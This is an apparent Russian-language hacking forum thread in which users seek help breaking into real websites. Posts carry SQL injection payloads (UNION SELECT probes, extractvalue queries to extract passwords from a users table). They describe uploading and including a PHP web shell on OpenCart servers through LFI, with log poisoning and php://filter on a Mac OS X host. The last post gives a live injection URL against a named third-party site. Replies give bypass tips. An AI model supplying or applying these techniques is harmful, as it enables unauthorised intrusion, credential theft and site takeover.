Бессмысленности здесь нет! er9j6@ привел способ вывода данных в формате через принтабельное поле. p.s. уберите лишние пробелы
Ах, да извиняюсь честно слово, синтаксис не глянул. Пробелы убрал и действительно имена таблиц по выскакивали: Убрав Восклицательный Знак в синтаксисе (table_schema!) я получил немного другой вид.. но правда это было не утешительно таблицы: dbrootgroupid; dblogin; dbpasswd; dbmail - исчезли
Что значит данная ошибка, или скорее как ее подправить, чтобы работало? Code: ERROR: UNION types integer and text cannot be matched LINE 1 Code: UNION(SELECT(version()),version(),version(),version(),(version()))
Подвержен ли данный код LFI ? В папке "../../download" лежит шелл, как его проинклудить через PHP: $route ? PHP: public function __construct($route, $args = array()) { $path = ''; $parts = explode('/', str_replace('../', '', (string)$route)); foreach ($parts as $part) { $path .= $part; if (is_dir(DIR_APPLICATION . 'controller/' . $path)) { $path .= '/'; array_shift($parts); continue; } if (is_file(DIR_APPLICATION . 'controller/' . str_replace('../', '', $path) . '.php')) { $this->file = DIR_APPLICATION . 'controller/' . str_replace('../', '', $path) . '.php'; $this->class = 'Controller' . preg_replace('/[^a-zA-Z0-9]/', '', $path); array_shift($parts); break; } } if ($args) { $this->args = $args; } $method = array_shift($parts); if ($method) { $this->method = $method; } else { $this->method = 'index'; } } public function getFile() { return $this->file; } public function getClass() { return $this->class; } public function getMethod() { return $this->method; } public function getArgs() { return $this->args; } }
TRX.new, Если можно использовать Windows-слэши, то используйте их, с UNIX-слэшами никак нельзя(Предполагается, что $this->file попадает в инклуд).
Вот сюда в итоге попадает $file PHP: private function execute($action) { $file = $action->getFile(); ... if (file_exists($file)) { require_once($file); Виндовые слеши не отрабатывают, т.к. все на Linux. Тогда такой вопрос: есть два разных сервака. На одном OpenCart 1.5.3.1 на другом 1.5.2.1. Методами, описанными в статье waraxe, я залил файл на оба сервера в папку download , но на 1.5.3.1 shell выполняется , а на 1.5.2.1 нет. Причем стоит заметить что я заливаю файл test.php.jpg , на сервере имя формируется так test.php.jpg.{md5(mt_rand())}. Имя файла на сервере узнать легко, поэтому это не проблема. Задача на сервере с 1.5.2.1 выполнить shell , но там получаю файл как картинку. Версия PHP на обоих серваках : 5.2.17 Также в корне сайта есть php.ini 1.5.3.1 : Code: magic_quotes_gpc = Off; register_globals = off; default_charset = UTF-8; memory_limit = 64M; max_execution_time = 18000; upload_max_filesize = 999M; safe_mode = Off; mysql.connect_timeout = 20; session.use_cookies = On; session.use_trans_sid = Off; session.gc_maxlifetime = 12000000; allow_url_fopen = on; display_errors = 1; error_reporting = E_ALL; 1.5.2.1: Code: magic_quotes_gpc = Off; magic_quotes_runtime = Off; magic_quotes_sybase = Off; register_globals = Off; default_charset = UTF-8; memory_limit = 64M; max_execution_time = 18000; upload_max_filesize = 999M; safe_mode = Off; mysql.connect_timeout = 20; session.use_cookies = On; session.use_trans_sid = Off; session.gc_maxlifetime = 12000000; allow_url_fopen = on; date.timezone = Asia/Yekaterinburg; ;display_errors = 1; ;error_reporting = E_ALL; Не думаю, что они положили отдельный файлик .htaccess в папку download. Цель : выполнить shell на серве с 1.5.2.1
Это уже вопрос по другому коду, вы уверены что он один и тот-же? Можно его, а так-же ссылку на эту статью? По инклуду вердикт однозначный - с использованием UNIX-слэшей спуск невозможен. Набросал тут кое-что на эту тему: https://forum.antichat.net/thread390482.html
Спасибо большое. Статья вот: http://www.waraxe.us/advisory-84.html Это для версии 1.5.2.1 , но применил и к 1.5.3.1 (и здесь то как раз работает, я получил рабочий шелл). В случае с 1.5.2.1 шелл грузится как изображение.
Дело обстоит так.. есть сайт, на котором можно узнать version; database запросом Code: and(extractvalue(1,concat(0x3a,database())))and' , а для получения пароля нужно выполнить запрос (Источник кн. Дмитрий Евтеев Positive technologies стр. 24) Code: and(extractvalue(1,concat(0x3a,(select pass from users limit 0,1)))and' задача заключается в том, чтобы обойти ПРОБЕЛЫ .. Знатоки, помогите!
Переделал на Code: and(extractvalue(1,concat(0x3a,select(password)from(tables)where(id=1))))and' ... не хочет зараза дикая
LFI провожу на сервере, на котором Mac OS X После двухдневного копания, отрыла логи error_log, не обновлялся с 2010 года, притом судя по последней записи "Defaced", этот лог тогда кто-то явно отравил В связи с этим вопрос: можно ли на Mac OS x найти некое подобие proc/self/environ ? Где бы писался user-agent? php://filter работает, но удалось посмотреть исходный код только main.php Нашла логин, пароль, бд от MySQL sphinx, но дело дохлое: только local host connection надо лить шелл...но как это сделать на этом *** Mac OS X
не, НЕТУ мЕНЯ НАСТОРАЖИВАЕТ, что все конфиги updat'ы 2010 года. что это значит? Сайт живой, обновляется просто постоянно, постоянный доступ посетителей.... edit: хотя нет, /var/log/secure.log обновляется сегодняшним днем к примеру
Ничего настораживающего. Рабочие логи, как могут быть в другом месте, так и вовсе быть отключены в целях повышеня производительности. Можно попробовать поискать субдомены, обычно на технических, девелоп и тп сабах логи включены, не требуют тонкого тюнинга и тп.
Code: http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+ Кто осилит?
